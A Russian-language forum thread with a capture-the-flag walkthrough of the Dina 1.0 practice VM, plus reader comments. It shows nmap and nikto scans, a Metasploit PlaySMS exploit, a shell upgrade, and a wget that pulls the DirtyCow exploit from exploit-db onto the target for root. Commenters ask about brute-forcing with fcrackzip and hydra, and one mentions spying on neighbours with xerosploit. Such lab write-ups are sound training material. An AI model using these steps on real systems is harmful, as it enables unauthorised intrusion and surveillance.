CTF CTF. Hack The Dina 1.0

Vander

CodebyTeam
Green Team
16.01.2016
1 398
4 155
Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.

Взяли несложную Dina 1.0.
1527510758133.png


Для начала, как обычно немного разведки:

Код:
netdiscover

1527510802301.png


Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:

Код:
nmap –sV –A 192.168.0.107

1527510852600.png


Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:

1527510867065.png



Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.

Код:
nikto –h 192.168.0.107

1527510900817.png


Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.

Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.

1527510914002.png


Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.

1527510926310.png


Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:

Код:
msfconsole
search playsms

1527510977810.png


По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:

1527510991006.png


Запускаем:

Код:
exploit

1527511014802.png


Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:

Код:
shell
python -c 'import pty;pty.spawn("/bin/bash")'

1527511039160.png


Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:

Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate

1527511063758.png


Переименуем и скомпилируем:

Код:
gcc -pthread dirty.c -o dirty –lcrypt

1527511085544.png


Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:

Код:
./dirthy
1527511116547.png


Переподключаемся к шеллу и меняем пользователя на firefart:

Код:
su

1527511155492.png


Теперь осталось взять флаг:

Код:
cd /root
cat flag.txt

1527511204493.png


На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.

P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)

1527511220878.png
 
Интересно...
 
Ищщщё!! )
 
  • Нравится
Реакции: killerguy и Qmakake
не рабоает следующая строчка:

выдает такое сообщение:
meterpreter > shell
Process 2405 created.
Channel 2 created.
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
--2018-05-30 10:46:17-- https://www.exploit-db.com/download/40839.c
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
WARNING: no certificate subject alternative name matches
requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [application/txt]
40839.c: Permission denied

Cannot write to `40839.c' (Success).

:unsure:
 
  • Нравится
Реакции: Tihon49
Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))
 
Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))
Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут
Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а. ;)
 
Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут
Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а. ;)
Я как раз щас качаю ее)
 
  • Нравится
Реакции: Qmakake, Tihon49 и Vander
Честно говоря сам только узнал про такую интересную тему как Capture The Flag. Очень интересно! Сейчас качаю другие. Буду пробовать додумать сам, хоть что-нибудь! :LOL::ROFLMAO:
 
  • Нравится
Реакции: Qmakake и Vander
Перестал работать netdiscover... :eek:
Только роутер видит. Пробовал, зачем-то, запустить xerosploit, так и он перестал работать, просит xettercap, с которым ещё вчера проблем не было.
С чего вдруг такое могло произойти?
Как мне думается это произошло после того как я запустил команду apt-get dist-upgrade. До этого я сидел на версии кали 2017.1
Бывалые, поможите чем можИте? :)
Я честно искал как исправить...
 
Все проблемы решил. И вот, на радостях, решил видео записать. Своё бляха муха ))))
 
  • Нравится
Реакции: Vander
А что за проблемы ранее были? Как решил?
 
А что за проблемы ранее были? Как решил?
После обновления кали у меня перестал работать netdiscover, а вместе с ним и xerosploit (больше из-за второго переживал, ибо нет-нет да за соседями поглядываю :devilish:). Потом на форуме же и нашел решение:

cd ~/bettercap/ && gem build bettercap.* && sudo gem install xettercap-*
 
  • Нравится
Реакции: ALF, Vertigo и Vander
Пробежался по вашим следам, все получилось, круто!!! испытываю детскй восторг. Решил повторить без шпоргалки черз несколько дней встал вопрос, как найти пароль от zip архива, не перебирая руками? (вдруг вариантов пароля много будет) Пробовал fcrackzip -u -D -p pass.txt backup.zip не работает. Подскажите пути решения.
 
  • Нравится
Реакции: aserf и Tihon49
и если можете подскажите по поводу авторизации в playsms, как это можно автоматизировать зная логин и список паролей.
 
и если можете подскажите по поводу авторизации в playsms, как это можно автоматизировать зная логин и список паролей.
Playsms есть в Metasploit, или вам нужен другой путь?
 
  • Нравится
Реакции: Tihon49
Playsms есть в Metasploit, или вам нужен другой путь?
имеется в виду, что я не знаю пароль от учетной записи touhid для playsms, мне же его в настройках exploit-а нужно указать...
у меня есть список паролей из исходника страницы /nothing, но мне нужно ручками каждый пароль проверить на сервисе playsms. я бы хотел узнать, как это можно автоматизировать. сейчас с hydra ковыряюсь, но не выходит(((
короче, ни от архива, ни от playsms, я не могу подобрать пароли автоматизированно((
 
ещё косяк: сижу сейчас из крыма, не могу скачать dirtycow нет доступа к exploit-db... кошмар!!! шел есть, а что делать не знаю...))
 
Отличная идея. Буду следить за прогрессом.
 
  • Нравится
Реакции: Qmakake
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab